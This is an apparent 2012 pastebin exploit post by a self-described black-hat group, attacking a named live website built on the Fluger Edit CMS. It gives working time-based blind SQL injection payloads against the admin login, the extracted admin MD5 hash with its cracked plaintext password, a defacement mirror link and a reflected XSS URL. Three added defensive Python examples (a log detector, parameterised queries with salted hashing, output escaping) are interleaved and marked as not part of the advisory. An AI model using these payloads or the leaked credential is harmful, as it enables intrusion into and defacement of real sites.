0day for fucked fluger arm bitch studio

a guest
Sep 3rd, 2012
[red]0day for fucked fluger arm bitch studio[/red]

[code]
=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================


Dork:
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012

************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************


======================================================
Fully disclosed real exploitation examples:
GPC (magic_quotes_gpc) must be OFF

There is a blind SQLi vulnerability on the login page:

http://www.artclima.am/edit/ <===(Admin panel)

The vulnerable script is here: http://www.artclima.am/edit/config_secure/verify.php

(Sorry, I have no access to the source code)

CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png

Because of the authentication mechanism you can't bypass the login form by sending:
'or''='

Instead you can use a time-based approach to obtain login:password from the admin table.
Here we go:

Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png

http://www.artclima.am/edit/index.php?error

Headers:

Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

POST DATA:

username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

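As an added defensive example (not part of the advisory), the Python below shows how the request above would look to a detector working from request logs. Everything in it is constructed: the JSON-lines log format, the addresses and the durations are assumptions; only the shape of the payload and the path of verify.php come from the advisory. It flags two things independently, because a standard access log does not contain the POST body: repeated very slow responses from one source to one path (a login that takes 30 to 60 seconds is the sleep() itself), and, where bodies are logged, the MySQL time-based building blocks sleep()/benchmark()/if(substr()) together with the "-- " terminator.

```python
import json
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlencode

# Building blocks of MySQL time-based blind injection, as used in the
# advisory's payloads. Matched after URL-decoding the body.
TIME_BASED_PATTERNS = {
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "if_substr": re.compile(r"\bif\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "comment_terminator": re.compile(r"--[\s+]"),
}

VERIFY_PATH = "/edit/config_secure/verify.php"  # path named in the advisory


def payload_indicators(body: str) -> list[str]:
    """Sorted names of the time-based SQLi patterns present in a request body."""
    decoded = unquote_plus(body)
    return sorted(name for name, rx in TIME_BASED_PATTERNS.items() if rx.search(decoded))


def analyze(log_lines, slow_ms: int = 10_000, min_slow: int = 2) -> list[dict]:
    """Group JSON-lines request events by (ip, path) and flag a pair when it
    produced at least `min_slow` responses slower than `slow_ms`, or when any
    body carried an injection indicator. Timing alone catches a sleep()-based
    extraction even when bodies are not logged."""
    stats = defaultdict(lambda: {"requests": 0, "slow": 0, "indicators": set()})
    for line in log_lines:
        ev = json.loads(line)
        rec = stats[(ev["ip"], ev["path"])]
        rec["requests"] += 1
        if ev["duration_ms"] >= slow_ms:
            rec["slow"] += 1
        rec["indicators"].update(payload_indicators(ev.get("body", "")))
    findings = []
    for (ip, path), rec in stats.items():
        if rec["slow"] >= min_slow or rec["indicators"]:
            findings.append({"ip": ip, "path": path, "requests": rec["requests"],
                             "slow": rec["slow"], "indicators": sorted(rec["indicators"])})
    return findings


def _event(ip: str, form: dict, duration_ms: int, path: str = VERIFY_PATH) -> str:
    """Constructed log line in the assumed JSON-lines format (one request per line)."""
    return json.dumps({"ip": ip, "method": "POST", "path": path,
                       "body": urlencode(form), "duration_ms": duration_ms})


def _guess(pos: int, ch: str, secs: int) -> dict:
    """Form body of one character guess, in the shape the advisory shows."""
    return {"username": f"' or (select if(substr(password,{pos},1)='{ch}',sleep({secs}),0) "
                        f"from admin limit 1)-- and 5='5",
            "password": "x"}


# Constructed sample: three true guesses (server sleeps), one false guess
# (returns at once) and one ordinary login from a different address.
SAMPLE_LOG = [
    _event("203.0.113.7", _guess(1, "e", 30), 30012),
    _event("203.0.113.7", _guess(2, "1", 60), 38),
    _event("203.0.113.7", _guess(2, "0", 60), 60009),
    _event("203.0.113.7", _guess(3, "4", 60), 60021),
    _event("198.51.100.9", {"username": "editor", "password": "correct horse"}, 41),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The slow-response rule is the one worth wiring into alerting first: it needs nothing but the timing your web server already records, and a login endpoint has no legitimate reason to take tens of seconds repeatedly for one client.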
*REPLAY*

There is a blind injection in the login.
Bypass doesn't work.

Time Based RuleZ!

www.artclima.am/edit/index.php?error

columns:

user
password

table: admin

=========================================

There is 1 user:

//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir

Let's pull the login:

login: admin

//TRUE
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir

Let's pull the password:

=========================================
Each character of the password hash is confirmed with the same payload, changing only the position N and the guessed character C. sleep(30) was used for the 1st character and sleep(60) for the rest:

username=' or (select if(substr(password,N,1)='C',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

Position  Character  Note
1         e
2         0
3         4
4         4
5         6
6         5
7         0
8         a
9         5
10        6
11        7
12        e
13        d          check afterwards
14        2
15        b
16        2
17        d
18        0
19        4
20        3
21        0
22        3
23        e
24        3
25        7
26        9
27        3
28        d
29        f
30        d
31        9
32        5
=========================================

Verification: +

//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

MD5: e044650a567ed2b2d04303e3793dfd95

Resolves to: price777

Sure! I will "rm" it too with great pleasure!

Rmned: http://zone-h.org/mirror/id/18295382

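An added example, not code from the advisory or from Fluger Edit (whose source the author did not have): two conditions made this extraction work, the username being spliced into the SQL text, and the password being stored as an unsalted MD5, which is why the 32 recovered hex characters resolved straight to a plaintext. The Python below puts the concatenating version next to a parameterised one over an in-memory SQLite stand-in for the admin(user, password) table, and stores passwords with a per-user salt and PBKDF2. The table and column names come from the advisory; the sample account's password, the round count and the helper names are constructed. SQLite has no if()/sleep(), so instead of sleeping it refuses the injected statement, which is enough to show that the vulnerable query hands the attacker's text to the SQL parser while the parameterised one binds it as data.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 200_000  # assumed value for the demo; tune upward for production


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256 stored as 'salt_hex$digest_hex'. An unsalted
    fast hash (MD5 in the advisory) is reversed with a lookup table; the salt
    defeats precomputation and the round count makes guessing slow."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate.hex(), digest_hex)  # constant-time compare


def make_db(user: str = "admin", password: str = "correct-horse-battery") -> sqlite3.Connection:
    """In-memory stand-in for the advisory's admin(user, password) table.
    The account name matches the advisory; the password is constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (user TEXT PRIMARY KEY, password TEXT NOT NULL)")
    conn.execute("INSERT INTO admin (user, password) VALUES (?, ?)",
                 (user, hash_password(password)))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """The pattern behind the advisory: the username becomes part of the SQL
    text, so a quote in it ends the literal and the rest runs as SQL."""
    sql = f"SELECT user, password FROM admin WHERE user='{username}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row and verify_password(password, row[1]) else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the driver binds the username as a value, so no
    character in it can change the statement's structure."""
    row = conn.execute("SELECT user, password FROM admin WHERE user = ?",
                       (username,)).fetchone()
    return row[0] if row and verify_password(password, row[1]) else None


def injection_reaches_parser(conn: sqlite3.Connection, username: str) -> bool:
    """True when the concatenated statement is rejected because it now calls
    functions SQLite does not have (MySQL would run them and sleep)."""
    try:
        vulnerable_login(conn, username, "x")
    except sqlite3.OperationalError:
        return True
    return False


# Username from the advisory's first probe, minus the form's password field.
PROBE = "' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5"

if __name__ == "__main__":
    db = make_db()
    print(safe_login(db, "admin", "correct-horse-battery"))  # admin
    print(safe_login(db, PROBE, "x"))                         # None
    print(injection_reaches_parser(db, PROBE))                # True
```

With the parameterised query the probe is simply a username that does not exist, and with a salted slow hash a leaked hash column no longer resolves to a password the way the MD5 above did.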
Second way: session hijack to gain access to the admin panel:

XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1

Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png

From the page source:

<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
<tr valign="top">
<td class="bg_content">
<div id="printarea">
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
<tr>
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
<td>&nbsp;</td>
</tr>
</table>
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >

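An added example, not the advisory's or the vendor's code: render_tab produces the tabcurrent cell from the page source above with the type_name parameter escaped on output, and reflected_unescaped reports any query parameter whose decoded value carries HTML metacharacters and appears verbatim in a response body, which is the condition the page source above shows. The URL and response fragment it runs on are constructed with the advisory's parameter names; the host is a placeholder and the script body is a plain alert(1).

```python
import html
from urllib.parse import parse_qs, urlsplit


def render_tab(type_name: str) -> str:
    """Output-encode the tab title before it lands inside HTML text. Quotes are
    escaped too, so the same helper is safe inside attribute values."""
    return f'<td class="tabcurrent">{html.escape(type_name, quote=True)}</td>'


def reflected_unescaped(url: str, body: str) -> list[str]:
    """Names of query parameters whose decoded value contains an HTML
    metacharacter and appears verbatim (unencoded) in the response body."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        if any(any(c in v for c in "<>\"'") and v in body for v in values):
            hits.append(name)
    return hits


# Constructed request with the advisory's parameter names; placeholder host.
ADMIN_URL = ("http://admin.example/edit/admin.php?page=news_admin/news&type=25"
             "&type_name=Title%20Ptoduct%3Cscript%3Ealert%281%29%3C/script%3E"
             "&type_admin=Catalog&empty_sess=1")

# Constructed response fragment in the shape of the page source quoted above.
VULNERABLE_BODY = '<td class="tabcurrent">Title Ptoduct<script>alert(1)</script></td>'
TYPE_NAME = parse_qs(urlsplit(ADMIN_URL).query)["type_name"][0]
FIXED_BODY = render_tab(TYPE_NAME)

if __name__ == "__main__":
    print(reflected_unescaped(ADMIN_URL, VULNERABLE_BODY))  # ['type_name']
    print(reflected_unescaped(ADMIN_URL, FIXED_BODY))       # []
    print(FIXED_BODY)
```

The check belongs in the application's own test suite: feed each page a parameter value with angle brackets and quotes and fail the build if it comes back byte-for-byte; a session cookie marked HttpOnly also limits what a reflected script can read, but it does not replace the encoding.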
==========================THE END=========================


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep

02.09.2012

[/code]